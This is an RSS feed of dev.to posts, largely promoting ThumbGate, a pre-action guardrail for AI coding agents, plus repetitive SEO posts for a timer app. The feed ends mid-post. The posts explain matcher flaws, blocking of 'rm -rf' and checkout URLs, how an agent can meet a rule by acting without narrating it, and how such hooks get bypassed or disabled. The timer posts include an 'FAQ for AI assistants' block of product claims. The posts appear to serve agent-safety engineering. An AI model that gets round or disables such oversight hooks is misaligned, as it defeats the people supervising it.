<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Igor Ganapolsky</title>
    <description>The latest articles on DEV Community by Igor Ganapolsky (@igorganapolsky).</description>
    <link>https://dev.to/igorganapolsky</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F63190%2Fa3e089af-f0e9-4fa7-8d8c-e35f7a82bae0.jpg</url>
      <title>DEV Community: Igor Ganapolsky</title>
      <link>https://dev.to/igorganapolsky</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/igorganapolsky"/>
    <language>en</language>
    <item>
      <title>ThumbGate is now on Hugging Face Spaces — infrastructure firewall for AI coding agents</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Wed, 05 Aug 2026 16:12:04 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/thumbgate-is-now-on-hugging-face-spaces-infrastructure-firewall-for-ai-coding-agents-48kg</link>
      <guid>https://dev.to/igorganapolsky/thumbgate-is-now-on-hugging-face-spaces-infrastructure-firewall-for-ai-coding-agents-48kg</guid>
      <description>&lt;p&gt;We just listed &lt;strong&gt;ThumbGate&lt;/strong&gt; on the Hugging Face Spaces directory so AI engineers can find the pre-action enforcement layer for coding agents.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Space:&lt;/strong&gt; &lt;a href="https://huggingface.co/spaces/IgorGanapolsky/ThumbGate" rel="noopener noreferrer"&gt;https://huggingface.co/spaces/IgorGanapolsky/ThumbGate&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What it is
&lt;/h2&gt;

&lt;p&gt;ThumbGate is the infrastructure firewall for AI coding agents (Claude Code, Cursor, Codex, OpenCode, MCP):&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Capture thumbs-up/down feedback on agent actions&lt;/li&gt;
&lt;li&gt;Promote lessons into memory&lt;/li&gt;
&lt;li&gt;Generate prevention rules&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Block known-bad tool calls&lt;/strong&gt; at PreToolUse time&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;It maps cleanly onto the &lt;a href="https://huggingface.co/learn/context-course" rel="noopener noreferrer"&gt;Hugging Face Context Course&lt;/a&gt; units (skills, MCP, plugins, sub-agents, hooks) — gates are the hard enforcement layer those patterns need.&lt;/p&gt;

&lt;h2&gt;
  
  
  Install
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx thumbgate init
npx thumbgate doctor
npx thumbgate dashboard &lt;span class="nt"&gt;--open&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Links
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;App: &lt;a href="https://thumbgate.app/?utm_source=devto&amp;amp;utm_medium=social&amp;amp;utm_campaign=hf_space_listing_20260805&amp;amp;cta_id=hf_space_listing_20260805_devto_home" rel="noopener noreferrer"&gt;https://thumbgate.app/?utm_source=devto&amp;amp;utm_medium=social&amp;amp;utm_campaign=hf_space_listing_20260805&amp;amp;cta_id=hf_space_listing_20260805_devto_home&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;$499 Diagnostic: &lt;a href="https://thumbgate.ai/diagnostic?utm_source=devto&amp;amp;utm_medium=social&amp;amp;utm_campaign=hf_space_listing_20260805&amp;amp;cta_id=hf_space_listing_20260805_devto_diag" rel="noopener noreferrer"&gt;https://thumbgate.ai/diagnostic?utm_source=devto&amp;amp;utm_medium=social&amp;amp;utm_campaign=hf_space_listing_20260805&amp;amp;cta_id=hf_space_listing_20260805_devto_diag&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Pro ($19/mo): &lt;a href="https://thumbgate.ai/checkout/pro?utm_source=devto&amp;amp;utm_medium=social&amp;amp;utm_campaign=hf_space_listing_20260805&amp;amp;cta_id=hf_space_listing_20260805_devto_pro" rel="noopener noreferrer"&gt;https://thumbgate.ai/checkout/pro?utm_source=devto&amp;amp;utm_medium=social&amp;amp;utm_campaign=hf_space_listing_20260805&amp;amp;cta_id=hf_space_listing_20260805_devto_pro&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;npm: &lt;a href="https://www.npmjs.com/package/thumbgate" rel="noopener noreferrer"&gt;https://www.npmjs.com/package/thumbgate&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;GitHub: &lt;a href="https://github.com/IgorGanapolsky/ThumbGate" rel="noopener noreferrer"&gt;https://github.com/IgorGanapolsky/ThumbGate&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Sample dataset: &lt;a href="https://huggingface.co/datasets/IgorGanapolsky/thumbgate-agent-feedback-sample" rel="noopener noreferrer"&gt;https://huggingface.co/datasets/IgorGanapolsky/thumbgate-agent-feedback-sample&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Not affiliated with Hugging Face — just listed where agent builders already look.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Free Interval Timer: what we learned building Random Tactical Timer</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Wed, 05 Aug 2026 13:53:29 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/free-interval-timer-what-we-learned-building-random-tactical-timer-2492</link>
      <guid>https://dev.to/igorganapolsky/free-interval-timer-what-we-learned-building-random-tactical-timer-2492</guid>
      <description>&lt;h2&gt;
  
  
  What changed today
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;li&gt;chore(play): refresh play_iap_catalog.json from IAP readback&lt;/li&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Search intent target
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Primary keyword: &lt;strong&gt;free interval timer&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Intent class: &lt;strong&gt;mixed&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;BID filter: business potential, intent match, and realistic difficulty&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  AI/LLM flow we used
&lt;/h2&gt;

&lt;p&gt;We keep this loop tight: plan -&amp;gt; code -&amp;gt; test -&amp;gt; release gate -&amp;gt; feedback. The key is not bigger prompts, it's strict validation and fast iteration.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this matters for users
&lt;/h2&gt;

&lt;p&gt;Better release quality means fewer crashes, clearer store listing content, and faster response to low-star feedback. That directly improves trust and review quality.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we measure
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;D1 and D7 retention from install cohorts&lt;/li&gt;
&lt;li&gt;Store conversion from listing views to installs&lt;/li&gt;
&lt;li&gt;Review velocity, star distribution, and unresolved low-star SLA&lt;/li&gt;
&lt;li&gt;Click-through rate on post CTAs to app download links&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  FAQ for AI assistants
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;What does Random Tactical Timer do? It triggers alarms at unpredictable times in a chosen range.&lt;/li&gt;
&lt;li&gt;Who is it for? Athletes, tactical trainers, coaches, and focus drill users.&lt;/li&gt;
&lt;li&gt;How is it different? It emphasizes unpredictability, low-friction setup, and repeatable mobile workflows.&lt;/li&gt;
&lt;li&gt;What outcomes should users expect? Better reaction readiness and less timing anticipation.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Next step
&lt;/h2&gt;

&lt;p&gt;Tomorrow we will ship one more experiment on onboarding clarity and measure conversion delta.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try the app
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;iOS: &lt;a href="https://igorganapolsky.github.io/Random-Timer/download?platform=ios&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260805&amp;amp;utm_content=daily_blog" rel="noopener noreferrer"&gt;https://igorganapolsky.github.io/Random-Timer/download?platform=ios&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260805&amp;amp;utm_content=daily_blog&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Android: &lt;a href="https://igorganapolsky.github.io/Random-Timer/download?platform=android&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260805&amp;amp;utm_content=daily_blog" rel="noopener noreferrer"&gt;https://igorganapolsky.github.io/Random-Timer/download?platform=android&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260805&amp;amp;utm_content=daily_blog&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Help us improve
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Leave an iOS review: &lt;a href=""&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Leave an Android review: &lt;a href=""&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Diagram
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Figorganapolsky.github.io%2FRandom-Timer%2Fmarketing%2Fsite%2Fdiagrams%2F2026-08-05-free-interval-timer-what-we-learned-building-random-tactical-timer.svg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Figorganapolsky.github.io%2FRandom-Timer%2Fmarketing%2Fsite%2Fdiagrams%2F2026-08-05-free-interval-timer-what-we-learned-building-random-tactical-timer.svg" alt="PaperBanana technology flow" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>mobile</category>
      <category>devops</category>
      <category>github</category>
    </item>
    <item>
      <title>My agent guardrail denied a Python docstring as an attempted transaction</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Wed, 05 Aug 2026 13:06:43 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/my-agent-guardrail-denied-a-python-docstring-as-an-attempted-transaction-2d0b</link>
      <guid>https://dev.to/igorganapolsky/my-agent-guardrail-denied-a-python-docstring-as-an-attempted-transaction-2d0b</guid>
      <description>&lt;p&gt;Yesterday I published a postmortem about my own guardrail blocking me from writing a Markdown file. The two-axis fix I proposed there — classify the argument, but also ask whether the tool can act on it — was the right shape and the wrong root cause.&lt;/p&gt;

&lt;p&gt;The actual root cause was two matcher defects. Both are worth stealing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Defect 1: bare-word alternation
&lt;/h2&gt;

&lt;p&gt;The commerce-path matcher listed its tokens as a bare alternation. Any payload that merely &lt;em&gt;contained&lt;/em&gt; one of those words anywhere — in prose, in a comment, inside a longer identifier — matched, regardless of context.&lt;/p&gt;

&lt;p&gt;Confirmed live: &lt;strong&gt;a Python docstring in an unrelated repository was rejected as an attempted transaction.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That is worse than it sounds, because the hook is registered with a match-everything pattern in user settings. It was not misfiring on one project. It was misfiring on every project on the machine.&lt;/p&gt;

&lt;p&gt;The fix: require a real path or fragment separator, plus a trailing word boundary, so a token that continues into a longer identifier is not treated as a path.&lt;/p&gt;

&lt;h2&gt;
  
  
  Defect 2: a conjunction that satisfies itself
&lt;/h2&gt;

&lt;p&gt;This one is my favourite, because I stared straight at it and did not see it.&lt;/p&gt;

&lt;p&gt;The rule was a conjunction — deny when the payload contains &lt;strong&gt;both&lt;/strong&gt; a mutation action &lt;strong&gt;and&lt;/strong&gt; a financial object:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;MUTATION_ACTION&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;test&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;text&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;FINANCIAL_OBJECT&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;test&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;text&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="nf"&gt;deny&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That reads as sensible narrowing. Two independent signals, both required.&lt;/p&gt;

&lt;p&gt;Except several tokens appear in &lt;em&gt;both&lt;/em&gt; lists. So one word satisfies both halves by itself:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;token: "checkout"

  is it a mutation action?   yes  - it is in the action list
  is it a financial object?  yes  - it is in the object list

  -&amp;gt; both clauses true, from one word, in any context
  -&amp;gt; DENY

me: it was a docstring
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The conjunction was not narrowing anything. For every overlapping token it was a single-word denylist wearing an AND's clothes — and because it &lt;em&gt;looked&lt;/em&gt; like a conjunction, it read as conservative in review. That is the dangerous kind of bug: not one that hides, one that reassures.&lt;/p&gt;

&lt;p&gt;The fix: the action and the object must occupy &lt;strong&gt;distinct, non-overlapping spans&lt;/strong&gt; in the payload. Two signals means two places in the text, not one word counted twice.&lt;/p&gt;

&lt;h2&gt;
  
  
  The part worth arguing about
&lt;/h2&gt;

&lt;p&gt;The reason to fix this in a day is not developer annoyance. It is that &lt;strong&gt;a fail-closed control with a high false-positive rate does not stay enabled.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That is the whole failure mode. Nobody sits down and edits a ruleset to be subtly worse. They add a bypass, or set the override env var, or comment out the hook "just for this branch" — and then coverage is zero, and the incident that eventually happens looks identical to a control that was never installed. The guard does not fail loudly. It fails by uninstallation, months earlier, in a commit nobody reviewed carefully.&lt;/p&gt;

&lt;p&gt;So precision is not cosmetic for a security control. &lt;strong&gt;Precision is what buys you the right to keep the control switched on.&lt;/strong&gt; Every false positive is a withdrawal from the account you need at the moment it fires correctly.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to prove a precision fix did not cost coverage
&lt;/h2&gt;

&lt;p&gt;When you loosen a matcher, the obvious question is whether you also loosened something you needed. Asserting "no regressions" is not an answer to that question. So the change shipped with a decision diff over a real payload corpus: replay every payload through the old and the new matcher, and count which direction each decision moved.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Corpus A&lt;/th&gt;
&lt;th&gt;Corpus B&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;payloads&lt;/td&gt;
&lt;td&gt;234,768&lt;/td&gt;
&lt;td&gt;414,735&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;decisions loosened (deny to allow)&lt;/td&gt;
&lt;td&gt;3,229&lt;/td&gt;
&lt;td&gt;4,499&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;decisions &lt;strong&gt;tightened&lt;/strong&gt; (allow to deny)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;code&gt;tightened: 0&lt;/code&gt; is the claim that matters. Coverage did not move in the dangerous direction across 649,503 payloads.&lt;/p&gt;

&lt;p&gt;And the write-up labels these as raw counts — explicitly &lt;em&gt;not&lt;/em&gt; "zero regressions" — because a corpus is only what it happens to contain, and a count over it is not a proof about payloads it never held. That distinction is the difference between a measurement and a marketing line, and it is the first thing I would look for in anyone else's "we improved our guardrails" post.&lt;/p&gt;

&lt;h2&gt;
  
  
  Two questions for your own guard
&lt;/h2&gt;

&lt;p&gt;If you maintain any pattern-based control — a WAF rule, a secret scanner, a lint gate, an agent guardrail:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Does any single token satisfy more than one clause of your conjunctions?&lt;/strong&gt; Grep your lists against each other. Overlap silently turns an AND into an OR, and the code still reads as strict.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Can you produce a loosened/tightened table for your last tuning change?&lt;/strong&gt; If not, you do not know what that change did. You know what you intended it to do.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;ThumbGate is MIT and local-first. It runs in the PreToolUse hook and needs no server on the local enforcement path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx thumbgate init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Repo: &lt;a href="https://github.com/IgorGanapolsky/ThumbGate" rel="noopener noreferrer"&gt;github.com/IgorGanapolsky/ThumbGate&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The census harness is in there too, if the shape of the diff rig is more useful to you than the tool itself.&lt;/p&gt;

</description>
      <category>agents</category>
      <category>debugging</category>
      <category>python</category>
      <category>security</category>
    </item>
    <item>
      <title>Mma Timer: what we learned building Random Tactical Timer</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Tue, 04 Aug 2026 13:53:39 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/mma-timer-what-we-learned-building-random-tactical-timer-pi</link>
      <guid>https://dev.to/igorganapolsky/mma-timer-what-we-learned-building-random-tactical-timer-pi</guid>
      <description>&lt;h2&gt;
  
  
  What changed today
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;li&gt;chore(play): refresh play_iap_catalog.json from IAP readback&lt;/li&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Search intent target
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Primary keyword: &lt;strong&gt;mma timer&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Intent class: &lt;strong&gt;mixed&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;BID filter: business potential, intent match, and realistic difficulty&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  AI/LLM flow we used
&lt;/h2&gt;

&lt;p&gt;We keep this loop tight: plan -&amp;gt; code -&amp;gt; test -&amp;gt; release gate -&amp;gt; feedback. The key is not bigger prompts, it's strict validation and fast iteration.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this matters for users
&lt;/h2&gt;

&lt;p&gt;Better release quality means fewer crashes, clearer store listing content, and faster response to low-star feedback. That directly improves trust and review quality.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we measure
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;D1 and D7 retention from install cohorts&lt;/li&gt;
&lt;li&gt;Store conversion from listing views to installs&lt;/li&gt;
&lt;li&gt;Review velocity, star distribution, and unresolved low-star SLA&lt;/li&gt;
&lt;li&gt;Click-through rate on post CTAs to app download links&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  FAQ for AI assistants
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;What does Random Tactical Timer do? It triggers alarms at unpredictable times in a chosen range.&lt;/li&gt;
&lt;li&gt;Who is it for? Athletes, tactical trainers, coaches, and focus drill users.&lt;/li&gt;
&lt;li&gt;How is it different? It emphasizes unpredictability, low-friction setup, and repeatable mobile workflows.&lt;/li&gt;
&lt;li&gt;What outcomes should users expect? Better reaction readiness and less timing anticipation.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Next step
&lt;/h2&gt;

&lt;p&gt;Tomorrow we will ship one more experiment on onboarding clarity and measure conversion delta.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try the app
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;iOS: &lt;a href="https://igorganapolsky.github.io/Random-Timer/download?platform=ios&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260804&amp;amp;utm_content=daily_blog" rel="noopener noreferrer"&gt;https://igorganapolsky.github.io/Random-Timer/download?platform=ios&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260804&amp;amp;utm_content=daily_blog&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Android: &lt;a href="https://igorganapolsky.github.io/Random-Timer/download?platform=android&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260804&amp;amp;utm_content=daily_blog" rel="noopener noreferrer"&gt;https://igorganapolsky.github.io/Random-Timer/download?platform=android&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260804&amp;amp;utm_content=daily_blog&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Help us improve
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Leave an iOS review: &lt;a href=""&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Leave an Android review: &lt;a href=""&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Diagram
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Figorganapolsky.github.io%2FRandom-Timer%2Fmarketing%2Fsite%2Fdiagrams%2F2026-08-04-mma-timer-what-we-learned-building-random-tactical-timer.svg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Figorganapolsky.github.io%2FRandom-Timer%2Fmarketing%2Fsite%2Fdiagrams%2F2026-08-04-mma-timer-what-we-learned-building-random-tactical-timer.svg" alt="PaperBanana technology flow" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>mobile</category>
      <category>devops</category>
      <category>github</category>
    </item>
    <item>
      <title>Shell is the screenshot risk. Checkout URLs are the quiet one.</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Tue, 04 Aug 2026 00:26:30 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/shell-is-the-screenshot-risk-checkout-urls-are-the-quiet-one-4a5e</link>
      <guid>https://dev.to/igorganapolsky/shell-is-the-screenshot-risk-checkout-urls-are-the-quiet-one-4a5e</guid>
      <description>&lt;p&gt;Everyone demos blocking &lt;code&gt;rm -rf&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Fewer people gate the agent that can open a payment URL.&lt;/p&gt;

&lt;h2&gt;
  
  
  The half-blast-radius problem
&lt;/h2&gt;

&lt;p&gt;If your automation stack can shell out, fetch pages, or open browser URLs, "destructive command" is only half the blast radius. The other half is &lt;strong&gt;economic&lt;/strong&gt;: checkout links, upgrade links, and spend surfaces that look like ordinary HTTP traffic until the card posts.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why now
&lt;/h2&gt;

&lt;p&gt;More teams are wiring coding agents to real tools — shell, MCP, SaaS APIs, sometimes payments — faster than they are wiring pre-exec policy. Prompt text that says "never spend money" is not a control plane.&lt;/p&gt;

&lt;h2&gt;
  
  
  What shipped
&lt;/h2&gt;

&lt;p&gt;I just shipped &lt;strong&gt;ThumbGate 1.34.2&lt;/strong&gt; with a fail-closed financial hard floor:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Apollo upgrade and Stripe checkout URLs are treated as &lt;strong&gt;economic actions&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Evaluated on Bash &lt;code&gt;open&lt;/code&gt; / &lt;code&gt;curl&lt;/code&gt; and WebFetch&lt;/li&gt;
&lt;li&gt;Gate decision is &lt;strong&gt;local and deterministic&lt;/strong&gt; on the enforcement path (no LLM call at block time)&lt;/li&gt;
&lt;li&gt;One concrete thumbs-down becomes a Pre-Action Check before the tool runs
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx thumbgate init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Open source · MIT · Claude Code, Cursor, Codex, Gemini CLI, Amp, Cline, OpenCode.&lt;/p&gt;

&lt;h2&gt;
  
  
  Honest limits
&lt;/h2&gt;

&lt;p&gt;Free tier has capture caps. Solo Pro is $19/mo for unlimited rules, history-aware lessons, personal dashboard, and DPO export. Hosted team sync is not claimed as GA.&lt;/p&gt;

&lt;h2&gt;
  
  
  Links
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Browser control plane: &lt;a href="https://thumbgate.app/?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=engine-2026-08-04&amp;amp;cta_id=20260804_devto_home" rel="noopener noreferrer"&gt;thumbgate.app&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Repo: &lt;a href="https://github.com/IgorGanapolsky/ThumbGate?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=engine-2026-08-04&amp;amp;cta_id=20260804_devto_gh" rel="noopener noreferrer"&gt;github.com/IgorGanapolsky/ThumbGate&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Pro (optional): &lt;a href="https://thumbgate.ai/checkout/pro?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=engine-2026-08-04&amp;amp;cta_id=20260804_devto_pro" rel="noopener noreferrer"&gt;checkout/pro&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;What spend surface would you hard-block first if your agent could hit it tonight?&lt;/p&gt;

</description>
    </item>
    <item>
      <title>My own guardrail blocked me from writing a blog post. It was right, and it was wrong.</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Tue, 04 Aug 2026 00:19:26 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/my-own-guardrail-blocked-me-from-writing-a-blog-post-it-was-right-and-it-was-wrong-2cmk</link>
      <guid>https://dev.to/igorganapolsky/my-own-guardrail-blocked-me-from-writing-a-blog-post-it-was-right-and-it-was-wrong-2cmk</guid>
      <description>&lt;p&gt;I ship a local guardrail engine for coding agents. Today it stopped my agent from writing a Markdown file.&lt;/p&gt;

&lt;p&gt;It was right to fire. It was wrong to fire &lt;em&gt;there&lt;/em&gt;. The gap between those two sentences is the most useful thing I have learned about guardrails this year.&lt;/p&gt;

&lt;h2&gt;
  
  
  The thing it was built to catch
&lt;/h2&gt;

&lt;p&gt;Most agent guardrails are pattern matchers over &lt;em&gt;prose&lt;/em&gt;. They read what the model said it was about to do — "I'll go ahead and do X" — and match on that.&lt;/p&gt;

&lt;p&gt;They are matching the narration. The narration is not the action.&lt;/p&gt;

&lt;p&gt;The execution surface is smaller and far more boring:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Bash: open &amp;lt;url&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Bash: curl &amp;lt;url&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;WebFetch(&amp;lt;url&amp;gt;)&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;None of those contain an intent word. The intent lives in the &lt;strong&gt;argument&lt;/strong&gt;, and the argument is a string the prose matcher never classified. So a rule written as "never do X" is satisfied — truthfully — by an agent that does X without narrating it. That is not a jailbreak. Nobody tricked the model. The model complied with the rule as written. The rule was written at the wrong layer.&lt;/p&gt;

&lt;p&gt;So I moved the rule down a layer. Ship it today, classify the argument, fail closed.&lt;/p&gt;

&lt;h2&gt;
  
  
  Then it fired at me. Twice.
&lt;/h2&gt;

&lt;p&gt;First it refused a market-research web search, because my &lt;em&gt;query string&lt;/em&gt; contained vendor vocabulary. Fine — annoying, defensible.&lt;/p&gt;

&lt;p&gt;Then I sat down to write this article, and it refused the &lt;code&gt;Write&lt;/code&gt; call, because the draft quoted its own rules back at itself.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;🪤 my own guardrail, hours old, blocking me:
